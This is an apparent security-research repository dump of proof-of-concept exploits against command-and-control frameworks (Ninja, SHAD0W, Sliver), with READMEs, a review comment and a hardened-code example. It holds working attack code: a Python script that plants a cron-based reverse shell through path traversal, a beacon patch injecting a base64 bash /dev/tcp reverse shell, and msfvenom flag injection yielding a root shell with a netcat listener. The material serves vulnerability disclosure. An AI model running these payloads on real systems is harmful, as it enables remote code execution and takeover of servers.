--------------------------------------------------------------------------------
from Crypto.Cipher import AES
import requests
import os
import base64
import random

endpoints = ["ServiceDefinition", "admin", "atom", "axis", "context", "default", "disco", "extwsdl", "index", "inquire", "inquiryapi", "inspection", "interface", "interfaces", "jboss-net", "jbossws", "juddi", "manual", "methods", "name", "names", "operation", "operations", "oracle", "proxy", "publish", "publishing", "query", "rss", "service", "services", "svce", "uddi", "uddiexplorer", "uddigui", "uddilistener", "uddisoap", "webservice", "webserviceclient", "webserviceclient+ssl", "webservices", "ws", "ws4ee", "wsatom", "wsdl", "wsgw", "wsil", "xmethods"]

URL = "http://192.168.167.131:4343"
CALLBACK_IP = "192.168.167.1"
CALLBACK_PORT = "8888"
FILEPATH = "../../../../../../../../../../etc/cron.d/pwned"
DATA = f"""* * * * * root python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{CALLBACK_IP}",{CALLBACK_PORT}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'
"""

agent_id = random.randint(1,99999999)
register_payload = {'id':agent_id,'data':'${os}**${IP}**${arch}**${hostname}**${domain}**${whoami}**$pid&${random}=${agent}'}

def encrypt(b64_key, data):
    bkey = base64.b64decode(b64_key)
    iv = os.urandom(16)
    aes = AES.new(bkey, AES.MODE_CBC, iv)

    mod = len(data) % 16
    if mod != 0:
        newlen = len(data) + (16 - mod)
        data = data.ljust(newlen, ' ')
    out = aes.IV + aes.encrypt(data.encode())
    return base64.b64encode(out)

for register_url in endpoints:
    res = requests.post(URL + "/" + register_url, data=register_payload)
    if res.status_code == 200 and len(res.text) == 44:
        print(f"Register endpoint found at /{register_url}")
        b64_key = res.text
        enc = encrypt(b64_key, DATA)

        for download_url in endpoints:
            download_payload = {'resource':agent_id,'d':enc, 'f': FILEPATH}
            res = requests.post(URL + "/" + download_url, data=download_payload)
            if res.status_code == 200 and res.text == "OK":
                print(f"Download endpoint found at /{download_url}")
                print(f"Filepath {FILEPATH} written")
                break
        break
--------------------------------------------------------------------------------
/ninja_rce/poc.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/IncludeSecurity/c2-vulnerabilities/a91bef7db34deea10ea959183bb786d3d060c556/ninja_rce/poc.gif
--------------------------------------------------------------------------------
/shad0w_rce/README.md:
--------------------------------------------------------------------------------
# SHAD0W Unauthenticated RCE

SHAD0W is vulnerable to an unauthenticated RCE against the C2 Teamserver. A malicious beacon can specify an arbitrary architecture value when registering with the Teamserver. When the C2 operator interacts with the beacon in certain ways, the architecture value is injected into a system compilation command.

![](poc.gif)

## Reproduction

The `register_beacon()` function in [lib/path_handler.py](https://github.com/bats3c/shad0w/blob/master/lib/path_handler.py#L86) accepts URL-encoded parameters from beacons when they register with the C2 Teamserver. Unlike in the `stage_beacon()` function, these parameters are not validated, so a malicious beacon can provide arbitrary architecture and operating system values.

Several modules in SHAD0W also use the beacon-provided values as parameters when compiling shellcode. For instance, the `migrate` module, which implements process migration, [passes the architecture value](https://github.com/bats3c/shad0w/blob/d35b9dc74319800bbab1678aba69258532ec0200/lib/commands/migrate.py#L62) to `buildtools.make_in_clone()`. The value is [eventually interpolated](https://github.com/bats3c/shad0w/blob/master/lib/buildtools.py#L152) into an `os.system()` call for the `make` command.

The beacon-provided values are displayed to the C2 operator when the beacon first connects to the C2 server, so some level of obfuscation is required to disguise the payload while still sparking the C2 operator's curiosity to interact with the beacon.

The easiest way to demonstrate the exploit is with a patch to the built-in SHAD0W beacon. The payload below, once triggered on the targeted Teamserver, starts a bash reverse shell. In the animated PoC above, some misleading strings have been added to disguise the injection.

```
diff --git a/beacon/injectable/beacon.c b/beacon/injectable/beacon.c
index c7752c6..4e6051f 100644
--- a/beacon/injectable/beacon.c
+++ b/beacon/injectable/beacon.c
@@ -47,14 +47,16 @@ void main()
         strcpy( CompInfo.OS, "NULL" );
     }
 
+    char payload[] = ";echo YmFzaCAtaSA%2bJiAvZGV2L3RjcC8xOTIuMTY4LjE2Ny4xMjgvODg4OCAwPiYxICYK|base64 -d|bash;";
+
     // format the data correctly so it can be used when we call back to the c2
 
 #if !defined(IMPERSONATE_SESSION)
-    sprintf(UriBuffer, "username=%s&domain=%s&machine=%s&arch=%s&os=%s&secure=%s", lpcUserName, lpcDomainName, lpcComputerName, CompInfo.Arch, CompInfo.OS, CompInfo.Secure);
+    sprintf(UriBuffer, "username=%s&domain=%s&machine=%s&arch=%s&os=%s&secure=%s", lpcUserName, lpcDomainName, lpcComputerName, payload, CompInfo.OS, CompInfo.Secure);
 #endif
 
 #if defined(IMPERSONATE_SESSION)
-    sprintf(UriBuffer, "username=%s&domain=%s&machine=%s&arch=%s&os=%s&secure=%s&impersonate=%s", lpcUserName, lpcDomainName, lpcComputerName, CompInfo.Arch, CompInfo.OS, CompInfo.Secure, IMPERSONATE_SESSION);
+    sprintf(UriBuffer, "username=%s&domain=%s&machine=%s&arch=%s&os=%s&secure=%s&impersonate=%s", lpcUserName, lpcDomainName, lpcComputerName, payload, CompInfo.OS, CompInfo.Secure, IMPERSONATE_SESSION);
 #endif
 
     // register back with the c2
```

Compile the beacon:

`python3 shad0w.py beacon -p x64/windows/static -H 192.168.167.131 -f psh -o update.ps1`

Run the beacon on a Windows host and set up the reverse shell.

When the C2 operator runs a module such as `migrate` against the beacon, the command injection will trigger, "hacking back" the C2 framework.
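Review bot: substituting `payload` for `CompInfo.Arch` in both `sprintf` calls shows the `arch` field arriving at the Teamserver as an arbitrary beacon-chosen string, so the fix belongs server-side: `register_beacon()` in `lib/path_handler.py` should validate `arch` (and `os`) against the fixed set of values the build tooling supports, as the README notes `stage_beacon()` already does, before the value can reach the `os.system()` call in `buildtools.make_in_clone()`. A smaller point on the same lines: `UriBuffer` is filled with unbounded `sprintf`, so a long `payload` overruns it; `snprintf` with `sizeof(UriBuffer)` is the safer form even in a PoC beacon.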
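Added example (not from SHAD0W or this repository): the string-interpolation pattern the README describes beside a hardened build-command routine that allowlists the architecture and passes it as a single argv element; `KNOWN_ARCHES`, `MAKE_DIR` and the `make` invocation are constructed assumptions, not SHAD0W's code. The free-text check also covers the `--out=` flag-injection case described in the Sliver section below.

```python
import subprocess

# Architectures the build tooling is assumed to support; this allowlist is
# constructed for the example and is not SHAD0W's own list.
KNOWN_ARCHES = frozenset({"x86", "x64"})
MAKE_DIR = "/opt/shad0w/clone"  # constructed path, not from the page
SHELL_META = set(";&|$`\n\"'")


def vulnerable_make_command(arch: str) -> str:
    """The pattern the README describes: a beacon-supplied value interpolated
    into the shell string handed to os.system(). Returned, not executed, so a
    crafted value's effect on the command line can be inspected."""
    return f"make -C {MAKE_DIR} ARCH={arch}"


def arch_accepted(arch: str) -> bool:
    """Allowlist check for fields with a fixed set of legal values: only an
    exact known architecture name passes (the check register_beacon() lacks)."""
    return arch in KNOWN_ARCHES


def free_text_accepted(value: str) -> bool:
    """For fields that cannot be allowlisted (hostnames, usernames): refuse
    anything a tool would parse as a flag or a shell as a separator. The same
    rule stops an injected `--out=` flag from reaching a builder like msfvenom."""
    return bool(value) and not value.startswith("-") and not (SHELL_META & set(value))


def safe_make_argv(arch: str) -> list:
    """Hardened form: validated value in its own argv element so no shell
    ever parses it; raises instead of building a command for a bad value."""
    if not arch_accepted(arch):
        raise ValueError(f"unsupported arch {arch!r}")
    return ["make", "-C", MAKE_DIR, f"ARCH={arch}"]


def run_make(arch: str) -> int:
    # subprocess.run with a list and shell=False, never os.system() on an f-string.
    return subprocess.run(safe_make_argv(arch), check=False).returncode


# Constructed beacon value shaped like the README's injection: a shell
# separator followed by an extra command, using a harmless command here.
CRAFTED_ARCH = "x64;id;"

if __name__ == "__main__":
    print("vulnerable:", vulnerable_make_command(CRAFTED_ARCH))
    print("accepted?", arch_accepted(CRAFTED_ARCH))
    print("hardened:", safe_make_argv("x64"))
```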
--------------------------------------------------------------------------------
/shad0w_rce/poc.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/IncludeSecurity/c2-vulnerabilities/a91bef7db34deea10ea959183bb786d3d060c556/shad0w_rce/poc.gif
--------------------------------------------------------------------------------
/sliver_auth_rce/README.md:
--------------------------------------------------------------------------------
# Sliver Auth RCE

## Description

Sliver version 1.6.0 is vulnerable to RCE on the teamserver by a low-privileged "operator" user. The RCE runs as the system root user, since the Sliver server is installed as root.

The exploit is pretty fun, as we make the Sliver server pwn itself.

![](poc.gif)

## Impact

As described in a [past issue](https://github.com/BishopFox/sliver/issues/65), "there is a clear security boundary between the operator and server, an operator should not inherently be able to run commands or code on the server." An operator who exploited this vulnerability would be able to view all console logs, kick all other operators, view and modify files stored on the server, and ultimately delete the server.

## Reproduction

First, configure the Sliver server [in multiplayer mode and add an operator profile](https://sliver.sh/docs?name=Multi-player+Mode).

Next, compile a slightly older version of the Sliver client. The commit after 5016fb8d updates the Cobra command-line parsing library in the Sliver client to strictly validate command flags.

```
git checkout 5016fb8d
VERSION=1.6.0 make client
```

The latest server version is targeted:

```
All hackers gain exalted
[*] Server v1.6.0 - bdfd89167dd47aece2397c638d482f94f3f91cba
[*] Client 1.6.0 - 5016fb8d7cdff38c79e22e8293e58300f8d3bd57
[*] Welcome to the sliver shell, please type 'help' for options
```

The exploit uses a command injection in the `generate msf-stager` command to inject the `--out` flag to `msfvenom`. We overwrite Sliver's own Go binary at `/root/.sliver/go/bin/go`:

```
sliver > generate msf-stager --lhost 192.168.0.128 --lport 8888 --advanced --platform=linux&--payload=linux/x64/shell_reverse_tcp&--format=elf&--out=/root/.sliver/go/bin/go

[*] Sliver implant stager saved to: [...]
```

The other injected flags force a Linux payload and are not necessary if the Sliver server is running on Windows.

If you check the saved implant locally on the client, it is 0 bytes, as the output was written to the file on the server instead.

On the attacking machine, set up a netcat listener:

```
$ nc -lvp 8888
Listening on 0.0.0.0 8888
```

Trigger the stager by running a command which executes `/root/.sliver/go/bin/go`:

```
sliver > generate beacon --mtls 1.2.3.4
[*] Generating new windows/amd64 beacon implant binary (1m0s)
[*] Symbol obfuscation is enabled
⠼ Compiling, please wait ...
```

A root shell will pop:

```
$ nc -lvp 8888
Listening on 0.0.0.0 8888
Connection received on 192.168.0.183 39238
whoami
root
```

The vulnerable code was introduced in https://github.com/BishopFox/sliver/pull/1281.
--------------------------------------------------------------------------------
/sliver_auth_rce/poc.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/IncludeSecurity/c2-vulnerabilities/a91bef7db34deea10ea959183bb786d3d060c556/sliver_auth_rce/poc.gif
--------------------------------------------------------------------------------